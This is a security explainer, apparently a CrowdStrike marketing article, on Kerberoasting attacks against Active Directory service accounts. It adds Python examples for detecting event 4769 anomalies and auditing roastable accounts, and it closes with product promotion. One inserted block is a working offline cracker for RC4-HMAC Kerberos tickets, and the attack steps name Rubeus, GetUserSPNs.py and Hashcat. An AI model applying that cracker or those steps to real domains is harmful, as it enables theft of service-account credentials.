
What is a Kerberoasting attack?

Kerberoasting is a post-exploitation attack technique against the Kerberos authentication protocol in Active Directory. It lets an adversary who holds any valid domain credential obtain service tickets that are encrypted under service account keys, take them offline, and recover the service accounts' passwords by guessing.

In such an attack, an authenticated domain user requests a Kerberos service ticket for a Service Principal Name (SPN). Part of the returned ticket is encrypted with a key derived from the service account's password; with the RC4-HMAC encryption type that key is simply the account's NT hash. The adversary then works offline to recover the password by dictionary or brute-force guessing, with no further interaction with the domain controller and therefore no failed logons or lockouts. Once the plaintext credentials of the service account are obtained, the adversary can impersonate the account owner and inherit access to any systems, assets, or networks granted to the compromised account.

Kerberoasting attacks are difficult to detect because:

  • Every step of the attack is a legitimate Kerberos operation performed by an authenticated user, and many traditional cybersecurity tools are not designed to monitor or analyze the behavior and activity of approved users.
  • Kerberoasting does not rely on malware, so traditional antivirus solutions cannot detect it, and the cracking itself happens offline, outside the reach of any sensor. Identity-based threat detection solutions and EDR tools can, however, flag the one observable part of the attack: unusual service ticket requests, such as a burst of requests for many SPNs from one account or requests that downgrade to RC4 encryption.

Why are Kerberoasting attacks so prevalent?

Adversaries go to great lengths to access user credentials via techniques like Kerberoasting because the ability to pose as a legitimate user helps the attacker avoid detection while advancing the attack path. After impersonation via credential theft, the adversary has access to any system, service or network the account is entitled to. Skilled attackers can also attempt to elevate their account privileges and move laterally throughout the network, collecting other account credentials, setting backdoors for future access and stealing data along the way.


How do Kerberoasting attacks work?

Kerberoasting succeeds when a service account has a weak or guessable password, and it is easiest when the service ticket is encrypted with an older cipher such as RC4-HMAC, whose key is simply the unsalted NT hash of that password. These attacks typically follow the process outlined below:

  1. A threat actor, using any valid domain user credentials, queries Active Directory (an LDAP search for user accounts with a populated servicePrincipalName attribute) to identify accounts that have SPNs (Service Principal Names) tied to them.
  2. The threat actor then requests a Kerberos service ticket for one or more of these accounts from the ticket granting service (TGS), using tools like GhostPack's Rubeus or Impacket's GetUserSPNs.py (originally published by SecureAuth); both also write the ticket out in a cracker-ready format.
  3. The Kerberos key distribution center (KDC) returns a ticket whose encrypted part is protected with a key derived from the service account's password (for RC4-HMAC, the NT hash itself). The KDC issues the ticket to any authenticated requester, whether or not that user is authorized to use the service.
  4. The threat actor takes the TGS ticket offline. Nothing further touches the domain controller, so there are no failed logons and no lockouts.
  5. The threat actor attempts to recover the service account's plaintext password by dictionary or brute-force guessing in tools like Hashcat (mode 13100 for RC4-HMAC tickets) or John the Ripper.
  6. With the service account password in hand, the threat actor authenticates as the service account and is granted access to any service, network or system associated with the compromised account.
  7. The attacker is then able to steal data, escalate privileges, or set backdoors on the network to ensure future access.
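Step 5 is where the attack is decided, so the following added example (not code from the original article, nor from Rubeus, GetUserSPNs.py, Hashcat or John) reproduces exactly what those crackers compute for a $krb5tgs$23$ (RC4-HMAC) line: derive the NT hash from each guess, derive the RFC 4757 keys for key usage 2, decrypt the ticket's encrypted part, and check its HMAC-MD5. The account name, realm, SPN, ticket body, password and wordlist are all constructed, and the sample ticket is built with the same primitive the KDC uses so that the example runs offline.

```python
"""Offline cracking of an RC4-HMAC (etype 23) Kerberos service ticket.
Added example: every name, ticket byte, password and wordlist entry is constructed."""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
KEY_USAGE_TGS_REP_TICKET = 2  # RFC 4120 key-usage number for a ticket's enc-part


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 ships MD4 only as a 'legacy' algorithm."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rol(x, n): return ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # (boolean function, additive constant, word order, shifts) per round
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = rol((a + fn(b, c, d) + x[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles so the next step updates the old d
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE password); for etype 23 it is the Kerberos key itself."""
    return md4(password.encode("utf-16-le"))

def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757 RC4-HMAC: checksum || RC4(K3, confounder || plaintext). Used here only to
    build a realistic sample ticket; the KDC does this with the service account's key."""
    confounder = confounder or os.urandom(8)
    k1 = hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)

def to_hashcat(user: str, realm: str, spn: str, enc_part: bytes) -> str:
    """Hashcat mode 13100 line, the format Rubeus and GetUserSPNs.py emit."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${enc_part[:16].hex()}${enc_part[16:].hex()}"

def crack(hashcat_line: str, wordlist):
    """Return the first wordlist entry whose NT hash verifies the ticket's HMAC, else None."""
    head, tail = hashcat_line.rsplit("*$", 1)
    if not head.startswith("$krb5tgs$23$*"):
        raise ValueError("only etype 23 (RC4-HMAC) is handled here")
    checksum_hex, edata_hex = tail.split("$")
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    usage = struct.pack("<I", KEY_USAGE_TGS_REP_TICKET)
    for candidate in wordlist:
        k1 = hmac_md5(nt_hash(candidate), usage)      # one MD4 + one HMAC-MD5 per guess
        k3 = hmac_md5(k1, checksum)
        if hmac_md5(k1, rc4(k3, edata)) == checksum:    # decrypt, then verify the MAC
            return candidate
    return None

# Constructed sample: a human-chosen service-account password and a stand-in ticket body.
SAMPLE_PASSWORD = "Summer2024!"
SAMPLE_ENC_PART = rc4_hmac_encrypt(
    nt_hash(SAMPLE_PASSWORD), KEY_USAGE_TGS_REP_TICKET,
    b"\x63\x82\x01\x00constructed EncTicketPart stand-in",  # a real one is DER-encoded ASN.1
    confounder=bytes(8),                                   # fixed so the line is reproducible
)
SAMPLE_LINE = to_hashcat("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", SAMPLE_ENC_PART)
WORDLIST = ["Password1", "Welcome1", "Summer2024!", "P@ssw0rd"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, WORDLIST))
```

Each guess costs one MD4, three HMAC-MD5s and an RC4 keystream, which is microseconds on a CPU and far less on a GPU. With the AES encryption types (17 and 18) the key derivation adds 4,096 PBKDF2-HMAC-SHA1 iterations per guess, which is the concrete reason the mitigation section below insists on AES-only service accounts.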

A few things to keep in mind:

  • Kerberoasting attacks do not require a Domain Admin account or an account that has elevated privileges. In fact, any Domain User account can be used in this attack type since any account can request service tickets from the TGS.
  • Kerberoasting requires the adversary to have existing access to a user account in order to request tickets from the KDC. This access can be achieved from a variety of methods, such as social engineering, malware or even purchasing user credentials on the dark web.
  • The SPN can be linked to either a computer (host) account or a domain user account. Host-based SPNs are not practically vulnerable to Kerberoasting because a computer account's password is a long, randomly generated key that Windows rotates automatically (every 30 days by default), which no wordlist or feasible brute force will reach. User account SPN passwords, on the other hand, are chosen by humans and therefore share the weaknesses of other manually created passwords: they may be weak, common, outdated, recycled, or reused, and such accounts are frequently set to "password never expires". Cracking tools can often recover these passwords in minutes to hours.
  • Kerberoasting also exploits a property of the Kerberos design: any authenticated domain user can request a service ticket for any SPN in the domain. The domain controller that handles the request does not check whether the user is authorized to use that service, because authorization is the service's job once it decrypts the ticket. Because the KDC issues a ticket for any SPN to any authenticated requester, adversaries can obtain tickets for every service account and attempt to crack them offline.

How to detect and stop Kerberoasting attacks

While traditional cybersecurity measures may struggle to detect Kerberoasting attacks in real-time, organizations can adopt several strategies to enhance their security posture and mitigate potential damage:

1. Develop and deploy a comprehensive identity security strategy and toolset

To enhance their security posture, organizations should develop and deploy a complete identity security strategy and tool set.

Identity security is a comprehensive solution that protects all types of identities within the enterprise—human or machine, on-prem or hybrid, regular or privileged—to detect and prevent identity-driven breaches, especially when adversaries manage to bypass endpoint security measures. As part of the identity security strategy, organizations should:

Ensure strong password hygiene: One of the best ways to reduce the risk of a Kerberoasting attack is to require strong passwords, above all for accounts that have SPNs registered, since those are the passwords an attacker gets to guess offline with no lockouts or rate limits. Strong passwords should be:

  • Long and complex: at least 14 characters for users and considerably longer for SPN-bearing service accounts, with a mix of uppercase and lowercase letters, numbers, and special characters
  • Random: avoiding recognizable words, phrases, or patterns; a password a human can remember is usually one a wordlist with mangling rules will reach
  • Regularly updated: rotated periodically so that a ticket captured today protects a password that stops working before it can be cracked

Long, complex, random passwords push dictionary and brute-force tools beyond feasible amounts of work; frequently updated passwords limit the time adversaries have to crack a captured ticket.

The IT team should ensure that all service accounts have "This account supports Kerberos AES 128 bit encryption" and "This account supports Kerberos AES 256 bit encryption" enabled (this sets the msDS-SupportedEncryptionTypes attribute) and that RC4 is not left enabled alongside AES. The KDC encrypts a service ticket with the strongest type that both the requester and the service account support, so a requester that asks for RC4 only (which cracking tools prefer) still receives an RC4 ticket unless RC4 is disabled for that account. With AES, the ticket key is derived from the password by PBKDF2 (4,096 iterations of HMAC-SHA1, salted with the realm and account name), so each offline guess costs thousands of times more than with RC4, where the key is simply the NT hash. Because AES keys are generated when a password is set, reset the password of any account whose password predates AES support in the domain.

  • Identify privileged service accounts: While any account with an SPN can be subject to a Kerberoasting attack, accounts that hold administrative rights are the most valuable targets because cracking them grants the attacker those rights directly.
  • Remove SPNs from human accounts: Ensure that Service Principal Names (SPNs) are not registered to user accounts, as this can inadvertently expose them to Kerberoasting attacks. SPNs are sometimes assigned to user accounts when administrators or developers install services, either manually or automatically during software setup. This practice can leave accounts unnecessarily vulnerable to Kerberoasting attacks. Instead, use dedicated service accounts or Group Managed Service Accounts (gMSAs) to reduce risk.
  • Implement Group Managed Service Accounts (gMSAs): Utilizing gMSAs provides automatic password management and enhanced security controls, reducing the risk associated with manual password management.
  • Monitor Kerberos ticket requests: Regularly audit and monitor Kerberos ticket requests to detect unusual patterns indicative of an attack. Look for anomalies such as an excessive number of TGS requests in a short timeframe, requests for high-privilege accounts, or attempts originating from unusual hosts. Unusual spikes in ticket requests or repeated attempts to request service tickets can be a red flag.
  • Employ the principle of least privilege: Restrict service accounts to the minimum necessary privileges required for their function. Reducing unnecessary permissions limits the impact of a compromised account and helps prevent lateral movement by attackers.
  • Require multi-factor authentication (MFA): Implementing MFA adds an additional layer of security, making it more difficult for attackers to leverage stolen credentials.
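The monitoring item above describes the one part of the attack that is visible on the domain controller: Windows Security event 4769 (a Kerberos service ticket was requested) carries the requester, the service name, the encryption type and the result. The following added example, not code from the original article or from any product, runs two hunts over constructed 4769-style records: one alerts when a single requester asks for many distinct user-style service accounts inside a short window, the other flags every successful RC4 (0x17) ticket, since a well-configured service account should never be issuing those. The field names mirror 4769's EventData, and the thresholds are assumptions to tune per environment.

```python
"""Kerberoasting hunt over Windows Security event 4769 records (added example).
The records are constructed to mirror 4769's EventData field names."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

RC4_HMAC = 0x17                  # TicketEncryptionType for RC4-HMAC (AES256 is 0x12, AES128 0x11)
SPN_BURST_THRESHOLD = 5          # distinct service accounts per requester (assumed tuning value)
WINDOW = timedelta(minutes=5)    # sliding window for the burst rule (assumed tuning value)


def is_candidate(ev) -> bool:
    """Only successful tickets for user-style service accounts can be roasted:
    krbtgt and machine accounts (names ending in '$') have long random keys."""
    svc = ev["ServiceName"]
    return ev["Status"] == "0x0" and svc.lower() != "krbtgt" and not svc.endswith("$")


def hunt(events):
    """Return alerts: one per (requester, service) RC4 ticket and one per requester burst."""
    alerts, seen_rc4, burst_reported = [], set(), set()
    recent = defaultdict(deque)  # requester -> deque of (time, service) inside WINDOW
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if not is_candidate(ev):
            continue
        who = f'{ev["TargetUserName"]} from {ev["IpAddress"]}'
        svc = ev["ServiceName"]
        if int(ev["TicketEncryptionType"], 16) == RC4_HMAC and (who, svc) not in seen_rc4:
            seen_rc4.add((who, svc))
            alerts.append({"rule": "rc4_ticket", "requester": who,
                           "service": svc, "time": ev["TimeCreated"]})
        q = recent[who]
        q.append((ev["TimeCreated"], svc))
        while ev["TimeCreated"] - q[0][0] > WINDOW:   # drop requests older than the window
            q.popleft()
        distinct = {s for _, s in q}
        if len(distinct) >= SPN_BURST_THRESHOLD and who not in burst_reported:
            burst_reported.add(who)
            alerts.append({"rule": "spn_burst", "requester": who,
                           "service": sorted(distinct), "time": ev["TimeCreated"]})
    return alerts


BASE = datetime(2025, 3, 1, 9, 0, 0)

def event(minute, user, ip, service, etype, status="0x0"):
    """Build one 4769-like record (constructed sample data, not a real log)."""
    return {"TimeCreated": BASE + timedelta(minutes=minute), "TargetUserName": user,
            "IpAddress": ip, "ServiceName": service,
            "TicketEncryptionType": f"0x{etype:x}", "Status": status}

SAMPLE_EVENTS = [
    event(0, "alice@CORP.LOCAL", "10.0.0.10", "svc_web", 0x12),          # normal AES ticket
    event(1, "alice@CORP.LOCAL", "10.0.0.10", "WS01$", 0x12),            # machine account: ignored
    *[event(2 + i * 0.3, "jdoe@CORP.LOCAL", "10.0.0.55", svc, 0x17)      # roast burst, RC4
      for i, svc in enumerate(["svc_sql", "svc_backup", "svc_sccm", "svc_iis", "svc_ldap", "svc_ora"])],
    event(3, "jdoe@CORP.LOCAL", "10.0.0.55", "krbtgt", 0x17),            # TGT renewal: ignored
    event(4, "bob@CORP.LOCAL", "10.0.0.20", "svc_sql", 0x17, status="0x1b"),  # failed: ignored
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["time"].time(), alert["rule"], alert["requester"], alert["service"])
```

The burst rule keys on requester plus source address so that a shared account used from a new host still stands out, and excludes krbtgt and machine accounts so that ordinary TGT renewals and host traffic do not inflate the count. In production, feed it the 4769 stream from every domain controller, and treat the RC4 rule as a hard finding once the account-level AES settings from the previous paragraph are in place.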

Unfortunately, many organizations do not have full visibility into all existing privileged accounts, especially those that are old and unused. Tools like BloodHound can analyze Active Directory relationships and identify service accounts with elevated privileges. The data gathered by BloodHound is stored in a Neo4j database that can be queried directly in the Cypher query language. Two Cypher queries are particularly useful for finding service accounts that hold administrative privileges: one returns accounts that have an SPN, sorted by the number of hosts on which they have explicit or group-delegated local administrative rights; the other returns SPN-bearing accounts that are members of a specific Active Directory group, typically Domain Admins.

  • Integrate the identity security solution: The identity security solution should also integrate with the organization’s existing Identity and Access Management (IAM) tools and processes, as well as a Zero Trust architecture.
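The same questions BloodHound answers about privilege can be asked of a plain directory export, together with the encryption-type and password-age checks from the items above. The following added example, not code from the original article or from BloodHound or any vendor, audits constructed account records shaped like an Active Directory export (sAMAccountName, servicePrincipalName, msDS-SupportedEncryptionTypes, pwdLastSet, memberOf, objectClass) and reports SPN-bearing user accounts that are privileged, still allow RC4 or DES, or have stale passwords. The group list and the one-year age threshold are assumptions; memberOf is simplified to group names, and pwdLastSet is assumed already converted from FILETIME to a datetime.

```python
"""Static audit of Kerberoastable accounts from an Active Directory export (added example).
Records are constructed; a real export would come from Get-ADUser or ldapsearch with the
attributes named below, and pwdLastSet is assumed already converted to a datetime."""
from datetime import datetime, timedelta

# msDS-SupportedEncryptionTypes bit flags (MS-KILE 2.2.7)
DES_CBC_CRC, DES_CBC_MD5, RC4_HMAC, AES128_CTS, AES256_CTS = 0x01, 0x02, 0x04, 0x08, 0x10
# Groups that turn a roasted account into a domain-wide problem (assumed list; extend it).
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators",
                     "Account Operators", "Backup Operators", "Schema Admins"}
MAX_PASSWORD_AGE = timedelta(days=365)  # assumed policy for SPN-bearing accounts


def etype_findings(value):
    """Explain what a msDS-SupportedEncryptionTypes value lets a requester ask for."""
    if not value:  # absent or 0: the domain default applies, which has historically included RC4
        return ["no explicit encryption types: domain default applies (RC4 likely allowed)"]
    findings = []
    if value & (DES_CBC_CRC | DES_CBC_MD5):
        findings.append("DES enabled")
    if value & RC4_HMAC:
        findings.append("RC4 enabled: requester can obtain a roastable etype-23 ticket")
    if not value & (AES128_CTS | AES256_CTS):
        findings.append("no AES type enabled")
    return findings


def audit(accounts, now):
    """Return SPN-bearing user accounts with findings, most dangerous first."""
    report = []
    for acct in accounts:
        name = acct["sAMAccountName"]
        if not acct.get("servicePrincipalName"):
            continue  # nothing to roast without an SPN
        if name.endswith("$") or "msDS-GroupManagedServiceAccount" in acct.get("objectClass", []):
            continue  # machine accounts and gMSAs have long random, auto-rotated keys
        findings = etype_findings(acct.get("msDS-SupportedEncryptionTypes"))
        age = now - acct["pwdLastSet"]
        if age > MAX_PASSWORD_AGE:
            findings.append(f"password last set {age.days} days ago")
        privileged = sorted(PRIVILEGED_GROUPS & set(acct.get("memberOf", [])))
        if privileged:
            findings.append("member of " + ", ".join(privileged))
        if findings:
            report.append({"account": name, "spns": acct["servicePrincipalName"],
                           "privileged": bool(privileged), "findings": findings})
    report.sort(key=lambda r: (not r["privileged"], -len(r["findings"]), r["account"]))
    return report


NOW = datetime(2025, 3, 1)

def account(name, spns=(), etypes=None, pwd_age_days=10, groups=(), object_class=("user",)):
    """Constructed record; memberOf is simplified to group names instead of DNs."""
    return {"sAMAccountName": name, "servicePrincipalName": list(spns),
            "msDS-SupportedEncryptionTypes": etypes,
            "pwdLastSet": NOW - timedelta(days=pwd_age_days),
            "memberOf": list(groups), "objectClass": list(object_class)}

SAMPLE_ACCOUNTS = [
    account("svc_sql", ["MSSQLSvc/sql01.corp.local:1433"], None, 900, ["Domain Admins"]),
    account("svc_legacy", ["HTTP/legacy.corp.local"], RC4_HMAC, 30),
    account("svc_web", ["HTTP/web.corp.local"], AES128_CTS | AES256_CTS, 10),
    account("gmsa_web$", ["HTTP/app.corp.local"], AES256_CTS, 5, (),
            ("user", "msDS-GroupManagedServiceAccount")),
    account("SQL01$", ["HOST/sql01.corp.local"], AES128_CTS | AES256_CTS | RC4_HMAC, 20),
    account("jdoe", [], None, 40),
]

if __name__ == "__main__":
    for row in audit(SAMPLE_ACCOUNTS, NOW):
        flag = "PRIVILEGED" if row["privileged"] else ""
        print(row["account"], flag, "; ".join(row["findings"]))
```

The ordering puts privileged roastable accounts first because they are both the most likely to be targeted and the most damaging to lose; an account like the constructed svc_sql (SPN, Domain Admins, default encryption types, password unchanged for years) is the textbook Kerberoasting finding and should be migrated to a gMSA or at least given a long random password and AES-only encryption types before anything else on the list.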

CrowdStrike Falcon® Identity Protection tools offer full identity audits and understanding of accounts, protocols, and services accessed by each. The Falcon platform integrates with partner MFA/IAM solutions to enhance identity security and enforce risk-based authentication.

2. Add proactive threat hunting

True proactive threat hunting, such as CrowdStrike Falcon OverWatch™, enables hunting 24/7 for unknown and stealthy attacks that utilize stolen credentials and are conducted under the guise of legitimate users. These are the types of attacks that standard measures can miss. Employing the expertise gained from daily "hand-to-hand combat" with sophisticated advanced persistent threat (APT) actors, the OverWatch team finds and tracks millions of subtle hunting leads daily to validate whether they are legitimate or malicious, alerting customers when necessary and avoiding false positives.

3. Enable true next-gen endpoint protection

Credential access is a popular technique used by attackers because it is highly effective. Organizations should take the threat of credential theft seriously and implement strategies to avoid victimization at the endpoint level. Employing a next-generation endpoint security solution, such as the CrowdStrike Falcon® platform, is critical for detecting and preventing Kerberoasting attacks. Falcon’s identity-based threat detection can identify abnormal authentication behaviors, detect unusual Kerberos ticket requests, and flag credential misuse in real-time—helping organizations stop identity-based threats before they escalate.


CrowdStrike's approach and expertise in Kerberoasting prevention

CrowdStrike frequently observes adversaries using valid account credentials across the attack lifecycle. In the most recent MITRE Engenuity ATT&CK Evaluation, the Falcon platform was revealed to be highly effective at detecting credential-based attacks, such as Kerberoasting.

At the outset of the evaluation, the Falcon platform immediately identified that breached passwords and compromised accounts were being used to request access to the system. This prevented the independent test evaluator from gaining initial access to the environment — effectively stopping the test before it could even start and making CrowdStrike Falcon® the only solution among those being evaluated where a protection component in the platform had to be disabled for the test to continue.

Even after our identity protection capabilities were disabled, the Falcon platform still achieved 100% prevention across all nine steps of the MITRE ATT&CK evaluation.

Protection from attacks that leverage stolen or compromised credentials is especially important in today’s risk landscape. According to the latest CrowdStrike Global Threat Report, access broker advertisements increased 50% year-over-year. Stopping the adversary in real time and preventing attacks from progressing requires a unified approach to security that enforces Zero Trust on the endpoint, the identity and the data.

Ryan Terry is a Senior Product Marketing Manager at CrowdStrike focused on identity security. Ryan has more than 10 years of product marketing experience in cybersecurity and previously worked at Symantec, Proofpoint, and Okta. Ryan has a Master's of Business Administration (MBA) from Brigham Young University.